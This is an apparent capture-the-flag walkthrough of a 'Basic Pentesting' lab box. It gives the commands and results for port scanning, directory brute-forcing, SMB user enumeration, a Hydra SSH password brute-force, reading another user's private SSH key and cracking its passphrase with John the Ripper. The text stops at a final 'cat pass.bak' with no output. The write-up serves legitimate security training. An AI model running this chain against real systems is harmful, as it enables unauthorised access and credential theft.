Skip to main content

Basic Pentesting

1. Reconnaissance and Scanning

export TARGET_IP=10.10.195.185
nmap -p- --min-rate 5000 $TARGET_IP -oN nmap_fullscan.txt

Results:

PORT     STATE SERVICE
22/tcp open ssh
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
8009/tcp open ajp13
8080/tcp open http-proxy

Key Observations:

  • SSH (Port 22): Secure Shell, used for remote command-line access.
  • HTTP (Port 80): Standard web server port.
  • NetBIOS/SMB (Ports 139, 445): Windows file sharing and network services.
  • AJP13 (Port 8009): Apache JServ Protocol, often used with Apache Tomcat.
  • HTTP-Proxy (Port 8080): Another HTTP-related service, potentially an alternative web server or proxy.

1.1. Web Directory Enumeration (Feroxbuster)

A directory brute-force attack was performed on the web server (port 80) to identify hidden directories and files:

feroxbuster -u http://10.10.195.185 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 200 -o feroxbuster_scan.txt --no-state

Results:

http://10.10.195.185/development/  (Directory Listing Enabled)

2. Directory Listing Analysis and Information Gathering

Browsing to http://10.10.195.185/development/ revealed two text files: dev.txt and j.txt. These files contained valuable information:

2.1. dev.txt Analysis:

  • Apache Struts 2: The developer ("K") mentions using Apache Struts 2, specifically version 2.5.12 (REST plugin). This is a critical finding, as Struts 2 has a history of vulnerabilities.
  • SMB Configured: Confirmation that SMB is configured.
  • Apache Setup: Confirmation of Apache web server.

2.2. j.txt Analysis:

  • Weak Password Policy: "K" mentions cracking "J's" password easily, indicating a weak password policy.

3. User Enumeration and Password Cracking

3.1. SMB User Enumeration enum4linux

enum4linux was used to enumerate users via the SMB service:

enum4linux -a 10.10.195.185 > enum4linux_results.txt

Results:

Two users were identified:

  • kay
  • jan

3.2. SSH Password Brute-Force (Hydra)

A brute-force attack was attempted against the SSH service for the user jan, using the rockyou.txt wordlist:

hydra -V -l jan -P /usr/share/wordlists/rockyou.txt ssh://10.10.195.185 -f -o hydra_results.txt

Results:

  • Successful login for jan with password armando.

4. Initial Access and Privilege Escalation

4.1. SSH Login

Successful login to the system via SSH using the cracked credentials:

ssh jan@10.10.195.185

4.2. System Enumeration (LinPEAS)

To identify potential privilege escalation vectors, LinPEAS (Linux Privilege Escalation Awesome Script) was transferred to the target and executed:

Attacker Machine
scp linpeas.sh jan@10.10.195.185:/tmp
Target Machine (jan)
ssh jan@10.10.195.185
chmod +x /tmp/linpeas.sh
/tmp/linpeas.sh > linpeas_output.txt
  • /tmp: is commonly used as a good directory for the pentester to place files, for it is world-writable.

Key Finding (LinPEAS):

LinPEAS identified a potential private SSH key for the user kay located at /home/kay/.ssh/id_rsa.

4.3. SSH Key Retrieval and Cracking

  • The id_rsa file was accessed (read) from jan's account. Because jan does not have write access to kay's home directory, we cannot use scp to copy the file directly. Instead, the contents of the file were printed to the terminal and manually copied.
  • The key was saved locally to a file named id_rsa_kay.
  • ssh2john was used to convert the key into a format suitable for John the Ripper.
  • John the Ripper was used to crack the passphrase protecting the private key.
cat /home/kay/.ssh/id_rsa # (On target, as jan, copy output)
# ... (On attacker machine) ...
echo "PASTE_COPIED_KEY_HERE" > id_rsa_kay
ssh2john id_rsa_kay > hash
john --wordlist=/usr/share/wordlists/rockyou.txt hash

Result:

  • The passphrase for kay's SSH key was cracked: beeswax.

4.4. Privilege Escalation (SSH as kay)

Using the cracked passphrase and the private key, successful login as kay was achieved:

ssh -i id_rsa_kay kay@10.10.195.185

4.5 Final Password Retrieval

The pass.bak file was found and read, revealing the final password:

cat pass.bak